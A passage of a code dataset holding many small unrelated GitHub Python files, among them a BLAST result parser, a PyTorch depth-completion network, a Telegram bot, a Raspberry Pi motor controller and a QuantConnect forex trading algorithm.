itertools\nimport operator\n\n\nparser = argparse.ArgumentParser(description='''\n\tParse BLAST outfmt=6 files. \n\tAUTHOR: Michelle Hwang''')\nparser.add_argument('blast', help=\"BLAST OUTFMT=6\")\nparser.add_argument('--n', type=int, default=1, help='Top n results to keep')\nparser.add_argument('--e', default=1E-3, type=float, help='''Optional e-value cut-off for\n\tBLAST results. Default is 1E-3.''')\nparser.add_argument('--p', type=float, default=0, help='''Optional percent identity\n\tcut-off for BLAST results. Default is no filter.''')\nparser.add_argument('--g', action='store_true', help='Only consider Trinity genes')\nparser.add_argument('--clean', action='store_true', help='Only print query and hit IDs')\nparser.add_argument('--swissprot', action='store_true', help='Shorten hit ID to just swissprot ID')\nargs = parser.parse_args()\n\n\ndef main():\n\n\twith open(args.blast) as f:\n\t\tlines = f.read().splitlines()\n\n\tsequences = []\n\tsequence_current = None\n\n\tfor line in lines:\n\n\t\tfield = line.split()\n\n\t\tif args.g is True:\n\t\t\tfield[0] = field[0].split('_i')[0]\n\t\tsequence = field[0]\n\n\t\tif float(field[10]) > args.e or float(field[2]) < args.p:\n\t\t\tcontinue\n\n\t\tif args.swissprot is True:\n\t\t\tfield[1] = field[1].split('|')[2]\n\n\t\tif sequence_current == sequence:\n\t\t\tsequences.append(field)\n\t\telse:\n\t\t\tif sequence_current is not None:\n\t\t\t\tsequences_sorted = sorted(sequences, key=operator.itemgetter(10), reverse=True)\n\t\t\t\tsequences_sorted = list(x for x,_ in itertools.groupby(sequences_sorted))\n\t\t\t\tfor seq in sequences_sorted[:args.n]:\n\t\t\t\t\tif args.clean is True:\n\t\t\t\t\t\tprint('\\t'.join([str(s) for s in seq[:2]]))\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint('\\t'.join([str(s) for s in seq]))\n\n\t\t\tsequence_current = sequence\n\t\t\tsequences = []\n\t\t\tsequences.append(field)\n\n\nmain()\n\n\n\n\n\n\n","repo_name":"michelle-hwang/snap","sub_path":"parse_blast_top_hit.py","file_name":"parse_blast_top_hit.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17961166968","text":"#Write a Python program to remove an empty tuple(s) from a list of tuples.\n\nList=[(),(),(0,8),(),(),(),('True','False'),(400,4),(2,3),(5,4),(8,1)]\n\nList=[t for t in List if t ]\nprint(List)\n\n\n\n\n","repo_name":"patel92dharti/Module-3-Collections-functions-and-Modules","sub_path":"26th_Topic.py","file_name":"26th_Topic.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5287323341","text":"#importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n#importing dataset\ndataset = pd.read_csv(r'D:\\upes\\2nd year\\Data mining and prediction by machines\\lab\\Salary_Data.csv')\ndataset = pd.read_csv(r'D:\\upes\\2nd year\\Data mining and prediction by machines\\lab\\Salary_Data.csv')\n\n\nX=dataset.iloc[:,:-1].values\nY=dataset.iloc[:,1].values\n\nprint(X)\nprint(Y)\n\n\nfrom sklearn.model_selection import train_test_split\nx_train, x_test, y_train, y_test = train_test_split(X,Y,test_size=.2, random_state=0)\n\nprint(x_train,'\\n')\nprint(x_test,'\\n')\nprint(y_train,'\\n')\nprint(y_test,'\\n')\n\n\nfrom sklearn.linear_model import LinearRegression\nLinearRegression\nregression = LinearRegression()\nregression.fit(x_train,y_train)\ny_pred=regression.predict(x_test)\nprint('\\n',y_pred)\n\nplt.scatter(x_train,y_train, color='green')\nplt.plot(x_train,regression.predict(x_train), color='red')\nplt.title('Salary Vs Experience(Training set)')\nplt.xlabel('Year of Experience')\nplt.ylabel('salary')\nplt.show()\n","repo_name":"AradhyaMahant/MachineLearning","sub_path":"Linear regression.py","file_name":"Linear regression.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6136308862","text":"#Reads to diles then compares them\r\na_file = open(\"1a.txt\")\r\nb_file = open(\"2a.txt\")\r\n\r\nlinesA = a_file.readlines()\r\nlinesB = b_file.readlines()\r\n\r\nprint(linesA)\r\nprint(linesB ,\"\\n\")\r\n\r\nif linesA == linesB:\r\n print(\"equal\")\r\n\r\nelse:\r\n print(\"not equal\")","repo_name":"VihaanChhabria/Python-Examples","sub_path":"compare text.py","file_name":"compare text.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13538260719","text":"import numpy as np \r\nimport scipy as sp\r\nimport pylab as pl\r\nfrom scipy.optimize import leastsq # 引入最小二乘函数\r\n \r\nn = 9 # 多项式次数\r\n\r\n# 目标函数\r\n\r\na = int(input(\"请选择函数类型:1.二次函数;2.一次函数\"))\r\nif a == 1:\r\n A = int(input(\"请输入A\"))\r\n B = int(input(\"请输入B\"))\r\n C = int(input(\"请输入C\"))\r\n def real_func(x):\r\n return A*x*x + B*x + C\r\nelse:\r\n K = int(input(\"请输入K\"))\r\n B = int(input(\"请输入B\"))\r\n def real_func(x):\r\n return K*x + B\r\n \r\n# 多项式函数\r\ndef fit_func(p, x):\r\n f = np.poly1d(p)\r\n return f(x)\r\n \r\n \r\n# 残差函数\r\nregularization = 0.1 # 正则化系数lambda\r\n \r\ndef residuals_func(p, y, x):\r\n ret = fit_func(p, x) - y\r\n ret = np.append(ret, np.sqrt(regularization) * p) # 将lambda^(1/2)p加在了返回的array的后面\r\n return ret\r\n \r\n \r\nx = np.linspace(0, 1, 9) # 随机选择9个点作为x\r\nx_points = np.linspace(0, 1, 1000) # 画图时需要的连续点\r\n \r\ny0 = real_func(x) # 目标函数\r\ny1 = [np.random.normal(0, 0.1) + y for y in y0] # 添加正太分布噪声后的函数\r\n\r\np_init = np.random.randn(n) # 随机初始化多项式参数\r\n \r\nplsq = leastsq(residuals_func, p_init, args=(y1, x))\r\n \r\nprint('拟合参数: ', plsq[0]) # 输出拟合参数\r\n\r\n#绘制图形 \r\npl.plot(x_points, real_func(x_points), label='real')\r\npl.plot(x_points, fit_func(plsq[0], x_points), label='fitted curve')\r\npl.plot(x, y1, 'bo', label='with noise')\r\npl.legend()\r\npl.show()","repo_name":"HnuAiSimOpt/Education","sub_path":"p1_202004061304.py","file_name":"p1_202004061304.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"ja","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"72097035754","text":"class Meter(object):\n def __init__(self, samplerate=44100):\n ### state\n self.w1 = 450.0 / samplerate # attack filter coeff\n self.w2 = 1300.0 / samplerate # attack filter coeff\n self.w3 = 1.0 - 5.4 / samplerate # release filter coeff\n self.g = 0.5108 # gain factor\n self.z1 = 0 # filter state\n self.z2 = 0 # filter state\n self.m = 0 # max value since last read\n\n ### lambda helpers (internal use)\n clamp = lambda self, n, minn, maxn: max(min(maxn, n), minn)\n applyfilt = lambda self, t, z, w: (t - z) * w if t > z else 0\n\n ### The main process block:\n ### input : an array of sampled signal values\n def process(self, block):\n z1 = self.clamp(self.z1, 0, 20)\n z2 = self.clamp(self.z2, 0, 20)\n m = 0\n\n for i in range(0, len(block), 4):\n z1 *= self.w3\n z2 *= self.w3\n for j in range(i, i + 4):\n t = abs(block[j])\n z1 += self.applyfilt(t, z1, self.w1)\n z2 += self.applyfilt(t, z2, self.w2)\n t = z1 + z2;\n if t > m: m = t\n\n self.z1 = z1 + 1e-10\n self.z2 = z1 + 1e-10\n self.m = m\n return self.g * self.m","repo_name":"ilzxc/audiothings","sub_path":"simple_meter/meter.py","file_name":"meter.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70632786154","text":"from django.utils.translation import gettext_lazy as _\nfrom django.http import HttpResponseRedirect\nfrom django.forms import inlineformset_factory, HiddenInput\nfrom django.contrib.contenttypes.forms import generic_inlineformset_factory\nfrom .base import CreateView, UpdateView\nfrom ..models.brew import Brew\nfrom ..models.batch import Batch\nfrom ..models.step import Step\nfrom ..forms.dtinput import DateTimeInput\n\n\nclass FormSetMixin:\n\n def get_form(self, form_class=None):\n\n form = super().get_form(form_class=form_class)\n\n form.fields['batch'].widget = HiddenInput()\n\n form.fields.pop('asset')\n form.fields.pop('step')\n form.fields.pop('tank')\n\n form.fields['date'].widget = DateTimeInput()\n\n return form\n\n @property\n def formsets(self):\n\n factory1 = inlineformset_factory(\n Brew, Brew.asset.through, exclude=[],\n )\n\n factory2 = inlineformset_factory(\n Brew, Brew.step.through, exclude=[],\n widgets={'start_time': DateTimeInput(),\n 'end_time': DateTimeInput()\n },\n can_order=True\n )\n\n factory3 = inlineformset_factory(\n Brew, Brew.tank.through, exclude=[],\n widgets={'date': DateTimeInput()},\n extra=1,\n )\n\n kwargs = {}\n\n if self.request.method == \"POST\":\n kwargs['data'] = self.request.POST\n\n if self.object:\n kwargs['instance'] = self.object\n\n formset_3 = factory3(**kwargs)\n setattr(formset_3, \"expanded\", True)\n \n return [factory1(**kwargs), factory2(**kwargs), formset_3]\n\n def form_valid(self, form):\n\n self.object = form.save()\n\n for _formset in self.formsets:\n if _formset.is_valid():\n _formset.save()\n\n return HttpResponseRedirect(self.get_success_url())\n\n\nclass BrewCreateView(FormSetMixin, CreateView):\n\n model = Brew\n\n def get_initial(self):\n\n if self.kwargs.get('batch'):\n return {'batch': Batch.objects.get(pk=self.kwargs['batch'])}\n else:\n return {}\n\n\nclass BrewUpdateView(FormSetMixin, UpdateView):\n\n model = Brew\n","repo_name":"ddokter/ninkasi","sub_path":"ninkasi/views/brew.py","file_name":"brew.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28261706712","text":"import asyncio\nimport logging\nimport os\nfrom dotenv import load_dotenv\nfrom aiogram.types import FSInputFile\nfrom aiogram import Bot, Dispatcher, types\nfrom aiogram.enums import ParseMode\nfrom aiogram.filters import Command\nfrom database import User, create_engine_and_session\nfrom timer import run_timer, stop_timer\n\n\nload_dotenv()\nTOKEN = os.getenv(\"BOT_TOKEN\")\ndp = Dispatcher()\nengine, async_session = create_engine_and_session()\n\n\n@dp.message(Command('start'))\nasync def send_welcome(message: types.Message):\n await User.create_table(engine)\n result = await User.add_user(async_session, message.from_user)\n if result:\n photo = FSInputFile(\"./profile_photo.jpg\")\n await message.answer_photo(photo, caption='This is pest programmer - my owner!')\n await run_timer(message)\n\n\n@dp.message(Command('users_today'))\nasync def send_stat(message: types.Message):\n user_count = await User.count_users(async_session)\n await message.answer(f'Total users in DB: {user_count}')\n\n\n@dp.message()\nasync def send_stat(message: types.Message):\n if message.text == 'Хорошего дня':\n await stop_timer(message.from_user.id)\n print('Он знает секрет, отмена операции!')\n else:\n await run_timer(message)\n\n\nasync def main() -> None:\n bot = Bot(TOKEN, parse_mode=ParseMode.HTML)\n await dp.start_polling(bot)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.ERROR, filename='bot.log')\n asyncio.run(main())\n","repo_name":"CrazyMoT/test_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1934063484","text":"\"\"\"\nAuthor: Wouter Van Gansbeke\nLicensed under the CC BY-NC 4.0 license (https://creativecommons.org/licenses/by-nc/4.0/)\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.utils.data\nimport torch.nn.functional as F\nimport numpy as np\nfrom .ERFNet import Net\nimport copy\nimport Utils.utils as utils\n\nclass uncertainty_net(nn.Module):\n def __init__(self, in_channels, out_channels=1):\n super(uncertainty_net, self).__init__()\n out_chan = 2\n\n self.combine = 'concat'\n self.in_channels = in_channels\n\n out_channels = 3\n\n self.depthnet = Net(in_channels=in_channels, out_channels=out_channels)\n\n local_channels_in = 2 if self.combine == 'concat' else 1\n local_channels_in = 4 if self.combine == 'concat_min' else local_channels_in\n self.convbnrelu = nn.Sequential(convbn(local_channels_in, 32, 3, 1, 1, 1),\n nn.ReLU(inplace=True))\n self.hourglass1 = hourglass_1(32)\n self.hourglass2 = hourglass_2(32)\n self.fuse = nn.Sequential(convbn(32, 32, 3, 1, 1, 1),\n nn.ReLU(inplace=True),\n nn.Conv2d(32, out_chan, kernel_size=3, padding=1, stride=1, bias=True))\n self.activation = nn.ReLU(inplace=True)\n self.softmax = torch.nn.Softmax(dim=1) \n\n def forward(self, input, epoch=50):\n if self.in_channels > 1:\n rgb_in = input[:, 1:, :, :]\n lidar_in = input[:, 0:1, :, :]\n input = torch.cat([input[:,:1], rgb_in],1)\n else:\n lidar_in = input\n \n # 1. GLOBAL NET\n embeddings, features = self.depthnet(input)\n embedding0, embedding1, embedding2 = embeddings\n global_features = embedding0[:, 0:1, :, :]\n precise_depth = embedding0[:, 1:2, :, :]\n conf = embedding0[:, 2:, :, :]\n input_max = F.max_pool2d(input[:, 0:1], 16)\n input_max = input[:,0:1] * (input[:,0:1] >= F.interpolate(input_max, size=input.shape[2:]) - 0.1*F.interpolate(input_max, size=input.shape[2:])).float()\n mask = input[:,0:1] == 0\n input_min = -F.max_pool2d(-input[:,0:1] -100*mask.float(), 16)\n input_min = input[:,0:1] * (input[:,0:1] <= F.interpolate(input_min, size=input.shape[2:]) + 0.1*F.interpolate(input_min, size=input.shape[2:])).float()\n\n # 2. Fuse \n if self.combine == 'concat':\n input = torch.cat((lidar_in, global_features), 1)\n elif self.combine == 'concat_min':\n input = torch.cat((lidar_in, global_features, input_min, input_max), 1)\n elif self.combine == 'add':\n input = lidar_in + global_features\n elif self.combine == 'mul':\n input = lidar_in * global_features\n elif self.combine == 'sigmoid':\n input = lidar_in * nn.Sigmoid()(global_features)\n else:\n input = lidar_in\n # 3. LOCAL NET\n out = self.convbnrelu(input)\n out1, embedding3, embedding4 = self.hourglass1(out, embedding1, embedding2)\n out1 = out1 + out\n out2 = self.hourglass2(out1, embedding3, embedding4)\n out2 = out2 + out\n out = self.fuse(out2)\n lidar_out = out\n\n # 4. Late Fusion\n lidar_to_depth, lidar_to_conf = torch.chunk(out, 2, dim=1)\n lidar_to_conf, conf = torch.chunk(self.softmax(torch.cat((lidar_to_conf, conf), 1)), 2, dim=1)\n out = conf * precise_depth + lidar_to_conf * lidar_to_depth\n return out, lidar_out, precise_depth, global_features\n\n\ndef convbn(in_planes, out_planes, kernel_size, stride, pad, dilation):\n\n return nn.Sequential(nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride, padding=dilation if dilation > 1 else pad, dilation=dilation, bias=False))\n\n\nclass hourglass_1(nn.Module):\n def __init__(self, channels_in):\n super(hourglass_1, self).__init__()\n\n self.conv1 = nn.Sequential(convbn(channels_in, channels_in, kernel_size=3, stride=2, pad=1, dilation=1),\n nn.ReLU(inplace=True))\n\n self.conv2 = convbn(channels_in, channels_in, kernel_size=3, stride=1, pad=1, dilation=1)\n\n self.conv3 = nn.Sequential(convbn(channels_in*2, channels_in*2, kernel_size=3, stride=2, pad=1, dilation=1),\n nn.ReLU(inplace=True))\n\n self.conv4 = nn.Sequential(convbn(channels_in*2, channels_in*2, kernel_size=3, stride=1, pad=1, dilation=1))\n\n self.conv5 = nn.Sequential(nn.ConvTranspose2d(channels_in*4, channels_in*2, kernel_size=3, padding=1, output_padding=1, stride=2,bias=False),\n nn.BatchNorm2d(channels_in*2),\n nn.ReLU(inplace=True))\n\n self.conv6 = nn.Sequential(nn.ConvTranspose2d(channels_in*2, channels_in, kernel_size=3, padding=1, output_padding=1, stride=2,bias=False),\n nn.BatchNorm2d(channels_in))\n ### Target Batch Norms\n self.conv5_bn_t = nn.BatchNorm2d(channels_in*2)\n self.conv6_bn_t = nn.BatchNorm2d(channels_in)\n\n self.conv5_bn_s = self.conv5[1]\n self.conv6_bn_s = self.conv6[1]\n\n\n \n def forward(self, x, em1, em2):\n x = self.conv1(x)\n x = self.conv2(x)\n x = F.relu(x, inplace=True)\n x = torch.cat((x, em1), 1)\n\n x_prime = self.conv3(x)\n x_prime = self.conv4(x_prime)\n x_prime = F.relu(x_prime, inplace=True)\n x_prime = torch.cat((x_prime, em2), 1)\n\n out = self.conv5(x_prime)\n out = self.conv6(out)\n\n return out, x, x_prime\n\n\nclass hourglass_2(nn.Module):\n def __init__(self, channels_in):\n super(hourglass_2, self).__init__()\n\n self.conv1 = nn.Sequential(convbn(channels_in, channels_in*2, kernel_size=3, stride=2, pad=1, dilation=1),\n nn.BatchNorm2d(channels_in*2),\n nn.ReLU(inplace=True))\n\n self.conv2 = convbn(channels_in*2, channels_in*2, kernel_size=3, stride=1, pad=1, dilation=1)\n\n self.conv3 = nn.Sequential(convbn(channels_in*2, channels_in*2, kernel_size=3, stride=2, pad=1, dilation=1),\n nn.BatchNorm2d(channels_in*2),\n nn.ReLU(inplace=True))\n\n self.conv4 = nn.Sequential(convbn(channels_in*2, channels_in*4, kernel_size=3, stride=1, pad=1, dilation=1))\n\n self.conv5 = nn.Sequential(nn.ConvTranspose2d(channels_in*4, channels_in*2, kernel_size=3, padding=1, output_padding=1, stride=2,bias=False),\n nn.BatchNorm2d(channels_in*2),\n nn.ReLU(inplace=True))\n\n self.conv6 = nn.Sequential(nn.ConvTranspose2d(channels_in*2, channels_in, kernel_size=3, padding=1, output_padding=1, stride=2,bias=False),\n nn.BatchNorm2d(channels_in))\n\n\n\n\n ### Target Batch Norms\n self.conv1_bn_t = nn.BatchNorm2d(channels_in*2)\n self.conv3_bn_t = nn.BatchNorm2d(channels_in*2)\n self.conv5_bn_t = nn.BatchNorm2d(channels_in*2)\n self.conv6_bn_t = nn.BatchNorm2d(channels_in)\n\n self.conv1_bn_s = self.conv1[1]\n self.conv3_bn_s = self.conv3[1]\n self.conv5_bn_s = self.conv5[1]\n self.conv6_bn_s = self.conv6[1]\n\n\n def forward(self, x, em1, em2):\n x = self.conv1(x)\n x = self.conv2(x)\n x = x + em1\n x = F.relu(x, inplace=True)\n\n x_prime = self.conv3(x)\n x_prime = self.conv4(x_prime)\n x_prime = x_prime + em2\n x_prime = F.relu(x_prime, inplace=True)\n\n out = self.conv5(x_prime)\n out = self.conv6(out)\n\n return out\n\n","repo_name":"alopezgit/project-adapt","sub_path":"Models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7729,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"72362143594","text":"import unittest\r\nimport Lab7\r\n\r\nclass TestLab(unittest.TestCase):\r\n \r\n def test_edit_distance(self):\r\n string = [\"Pittsburgh\",\"Pennsylvania\",\r\n \"Tucson\",\"Arizona\",\r\n \"Cincinnati\",\"Ohio\",\r\n \"Albuquerque\",\"New Mexico\",\r\n \"Culpeper\",\"Virginia\",\r\n \"Asheville\",\"North Carolina\",\r\n \"Worcester\",\"Massachusetts\",\r\n \"Manhattan\",\"New York\",\r\n \"Phoenix\",\"Arizona\",\r\n \"Niagara Falls\",\"New York\"]\r\n## string1 = \"Sunday\"\r\n## string2 = \"Saturday\"\r\n for i in range (len(string)):\r\n if i+1==len(string):\r\n return\r\n string1=string[i]\r\n string2=string[i+1]\r\n print(string1,string2)\r\n Lab7.edit_distance(string1, string2, len(string1), len(string2))\r\n \r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","repo_name":"aponce12/Lab7","sub_path":"test_lab7.py","file_name":"test_lab7.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38932611223","text":"from common.common_rakuten import *\n\n@click.command('task_tracking', help=\"Hello World.\") \n@with_appcontext\ndef task_tracking_run():\n # 処理日\n process_date = datetime.datetime.now().strftime('%Y%m%d')\n # 出力ファイル名\n file_name='research_tracking'+process_date+'.tsv'\n # webdriver\n driver=get_driver()\n input_list=[]\n f = open(\"C:\\\\serp\\\\files\\\\input\\\\1col.tsv\", 'r', encoding='UTF-8')\n for data in f:\n input_list.append(data.rstrip('\\n'))\n f.close()\n\n for asin in input_list:\n try:\n\n driver.get('https://keepa.com/#!product/5-'+asin)\n time.sleep(10)\n now_price=driver.find_element(By.XPATH, '//*[@id=\"productInfoBox\"]/span[2]/span').get_attribute('innerHTML').replace('¥ ', '').replace(',', '')\n purpose_price=round(int(now_price)*0.75)\n driver.find_element(By.ID, \"tabTrack\").click()\n ama_price_element=driver.find_element(By.ID, \"csvtype-5-0-threshold\")\n new_price_element=driver.find_element(By.ID, \"csvtype-5-1-threshold\")\n ama_price_element.clear()\n new_price_element.clear()\n ama_price_element.send_keys(purpose_price)\n new_price_element.send_keys(purpose_price)\n focusToElement(driver, By.ID, \"submitTracking\", True)\n driver.find_element(By.ID, \"submitTracking\").click()\n except Exception as e:\n logger.debug('tracking error '+ asin)\n print(asin)\n print(e)\n continue\n\n","repo_name":"itsu1113/serp","sub_path":"jobs/task_tracking.py","file_name":"task_tracking.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12105647599","text":"import RPi.GPIO as GPIO\nfrom motors import motors\nfrom motors import motor_speeds\nfrom motors import motor_pins\nfrom time import sleep\nfrom speedSensor import speedSensor\n#Motor tanımları buradan çıkartıldı.\nclass carsWith2Motor:\n def __init__(self, motorRight: motors, motorLeft: motors):\n self.motorRight:motors = motorRight\n self.motorLeft:motors = motorLeft\n self.direction = 1 # Forward\n self.angle = 0 # -1 sola bir vites fazla +sağa bir vites fazla\n self.gear = 1\n self.motorRight.motorSet()\n self.motorLeft.motorSet()\n self.stopped = True\n \n def turnRight(self):\n if self.motorLeft.isMaxGear():\n if self.motorRight.isMinGear():\n return\n else:\n self.motorRight.gearDown(1)\n else:\n self.motorLeft.gearUp(1) \n \n def turnLeft(self):\n if self.motorRight.isMaxGear():\n if self.motorLeft.isMinGear():\n return\n else:\n self.motorLeft.gearDown(1)\n else:\n self.motorRight.gearUp(1) \n\n def stop(self):\n self.motorRight.stop()\n self.motorLeft.stop()\n pass\n \n def changeGear(self,gear):\n self.motorRight.changeGear(gear)\n self.motorLeft.changeGear(gear)\n self.gear = gear\n def gearUp(self,up):\n self.motorRight.gearUp(up)\n self.motorLeft.gearUp(up)\n\n def gearDown(self,down):\n self.motorRight.gearDown(down)\n self.motorLeft.gearDown(down)\n \n def forward(self):\n self.changeGear(self.gear)\n self.motorRight.forward()\n self.motorLeft.forward()\n\n def backward(self):\n self.changeGear(self.gear)\n self.motorRight.backward()\n self.motorLeft.backward()\n\n def setSpeed(self,speed):\n breakpoint()\n self.motorRight.setSpeed(speed) \n self.motorLeft.setSpeed(speed)\n\ndef getStandartCar():\n pinsLeft = motor_pins(17,18,23)\n pinsRight = motor_pins(22,27,24)\n\n theSpeeds = motor_speeds(50,4,1)\n motorRight = motors.fromPinDefs(pinsRight, theSpeeds)\n motorLeft = motors.fromPinDefs(pinsLeft, theSpeeds)\n \n speedSensorRight = speedSensor(25,1,20,5)\n motorRight.setSpeedSensor(speedSensorRight)\n motorRight.spS.turnOnDetector()\n \n #speedSonsorLeft = speedSensor(25,1,20,5)\n #motorLeft.setSpeedSensor(speedSensorLeft)\n\n myCar = carsWith2Motor(motorRight, motorLeft)\n \n return myCar\n\ndef carTest():\n #pinsLeft = motor_pins(23,24,25)\n pinsLeft = motor_pins(17,18,23)\n pinsRight = motor_pins(22,27,24)\n # MOTOR1IN2 = 24\n # MOTOR1IN1 = 23\n # MOTOR1EN = 25\n # MOTOR2IN2 = 27\n # MOTOR2IN1 = 22\n # MOTOR2EN = 26\n\n GPIO.setmode(GPIO.BCM)\n\n theSpeeds = motor_speeds(70,4,1)\n motorRight = motors.fromPinDefs(pinsRight, theSpeeds)\n motorLeft = motors.fromPinDefs(pinsLeft, theSpeeds)\n\n myCar = carsWith2Motor(motorRight, motorLeft)\n myCar.forward()\n myCar.changeGear(2)\n sleep(2)\n myCar.turnRight(1)\n sleep(2)\n myCar.backward()\n sleep(1)\n myCar.stop()\n\n #GPIO.cleanup()\n \n #carTest()\n","repo_name":"mehmetkuzu/RPi_motors_cars","sub_path":"motors_cars.py","file_name":"motors_cars.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21110449412","text":"from datetime import datetime, timedelta\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom math import floor\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import tree\nimport talib \nfrom talib import MA_Type\n\nclass BasicTemplateAlgorithm(QCAlgorithm):\n\n def Initialize(self):\n \n '''\n NOTE: \n BLOCK COMMENTS - USER-DEFINED PARAMETERS\n - DEBUG BLOCKS\n LINE COMMENTS - CODE-SNIPPET DOCUMENTATION\n '''\n \n ''' Set Start Date [User-Defined] '''\n self.SetStartDate(2018, 11, 7) \n ''' Set End Date [User-Defined] '''\n self.SetEndDate(2018, 11, 21) \n ''' Set Strategy Cash [User-Defined] '''\n self.SetCash(100000) \n \n '''\n Currencies Selected to Provide Extra Information for Prediction Model [User-Defined]\n '''\n self.symbols = [\"NZDUSD\", \"AUDUSD\", \"GBPUSD\", \"EURUSD\",] \n \n \n '''\n Extra Currency Pairs to be Chosen by User for Extra Features [User-Defined]\n NOTE: The Best-Found Combination is the 4 Above.\n NOTE: Add Currency Pair from List Below into 'Self.Extra_Sym'\n NOTE: Overcrowding Currency Pairs May Cause Overfitting\n\n List of Currency Pairs to Choose From:\n \"USDSEK\"\n \"USDJPY\"\n \"USDCAD\"\n \"USDNOK\"\n \"USDSEK\"\n \"USDCHF\"\n \"USDZAR\"\n '''\n self.extra_sym = []\n self.symbols = self.symbols + self.extra_sym # Extend Symbols List\n self.sym_n = len(self.extra_sym) # For Dynamically Locating Signals\n \n ''' Target Trading Symbol [User-Defined] '''\n self.trading_symbol = \"EURUSD\"\n \n for i in self.symbols:\n ''' [User-Defined Resolution] '''\n self.AddForex(i, Resolution.Daily) \n \n self.long_list = [] # List of Long Positions \n self.short_list = [] # List of Short Positions\n \n ''' Historical Data Period [User-Defined] '''\n self.data_period = 300 \n ''' Rolling Window Period [User-Defined] '''\n self.window_period = 55\n\n def OnData(self, data):\n \n data_dict = {} # Dictionary of Currency & List of Data as Key Pair Values\n price = 0 # Selected Trading Currency's Current Price\n \n # For All Currency Selected for Prediction Model\n for i in self.symbols: \n \n ''' Download Historical Data [User-Defined Resolution] '''\n currency_slices = self.History([i], self.data_period, Resolution.Daily)\n \n # Get Entire Currency Slice\n currency_bars = currency_slices.loc[i]\n \n ''' \n Get Attribute (Feature Selection) [User-Defined]\n NOTE: This is a 'Choose-One'\n NOTE: Multi-Attribute Features can be a Future Improvement\n \n Possible Features to Choose From:\n high, low, close\n askopen, askhigh, asklow, askclose\n bidopen, bidhigh, bidlow, bidclose\n '''\n currency_close = currency_bars['close']\n \n # Store in Dictionary\n data_dict[i] = currency_close\n \n # Grab Target Trading Currency's Current Price [User-Defined Currency]\n if i == self.trading_symbol:\n price = currency_close[-1]\n \n '''\n Debug 1: Checking Information is Stored Correctly in Dictionary \n '''\n #self.Debug(\"Columns Check: \" + str(list(data_dict.keys())))\n #self.Debug(\"Value Check: \" + str(data_dict)) \n \n # Convert Dictionary to DataFrame\n prices_in_df = pd.DataFrame(data_dict, columns = data_dict.keys())\n # Reverse all USD-base currency pairs\n prices_in_df = self.reverseCurr(prices_in_df, self.extra_sym)\n\n '''\n Debug 2: Checking if Dictionary is Properly Converted to DataFrame\n '''\n #self.Debug(\"Prices in Dataframe Check: \")\n #self.Debug(prices_in_df.head())\n \n # Calls to Run Ensemble - Decision Tree, Random Forest, Logistic Regression [User-Defined Threshold]\n # Returns a DataFrame of Predicted Signals Based on Selected Features\n '''\n Signals:\n 1 - Take Long Position\n 0 - Hold Position\n -1 - Take Short Position\n '''\n signals_DT_in_df = self.predict('DecisionTree', prices_in_df, period = self.window_period, threshold = 0.03)\n signals_RF_in_df = self.predict('RandomForest', prices_in_df, period = self.window_period, threshold = 0.03)\n signals_LR_in_df = self.predict('LogisticRegression', prices_in_df, period = self.window_period, threshold = 0.03)\n\n '''\n Debug 10: Checking Generated Signals\n '''\n #self.Debug(\"Generated Signals from DT: \")\n #self.Debug(signals_DT_in_df) \n #self.Debug(\"Generated Signals from RF: \")\n #self.Debug(signals_RF_in_df) \n #self.Debug(\"Generated Signals from LR: \")\n #self.Debug(signals_LR_in_df) \n \n # Concatenate all Information into a Master Table\n prices_in_df = prices_in_df[-len(signals_DT_in_df):]\n master_table = pd.concat([prices_in_df, signals_DT_in_df, signals_RF_in_df, signals_LR_in_df], axis = 1).dropna()\n\n '''\n Debug 11: Checking Master Table is in Order\n '''\n #self.Debug(\"Master Table Check: \")\n #self.Debug(master_table.head())\n #self.Debug(\"Current OnData Check: \")\n self.Debug(master_table.tail(1).iloc[:,4:]) # Check Information on Current OnData\n \n if master_table.tail(1).iloc[0][4 + self.sym_n] == 1.0 and \\\n master_table.tail(1).iloc[0][5 + self.sym_n] == 1.0 and \\\n master_table.tail(1).iloc[0][6 + self.sym_n] == 1.0 and \\\n self.trading_symbol not in self.long_list and \\\n self.trading_symbol not in self.short_list :\n \n self.SetHoldings(self.trading_symbol, 1)\n self.long_list.append(self.trading_symbol)\n self.Debug(\"long\")\n \n if self.trading_symbol in self.long_list:\n \n cost_basis = self.Portfolio[self.trading_symbol].AveragePrice\n 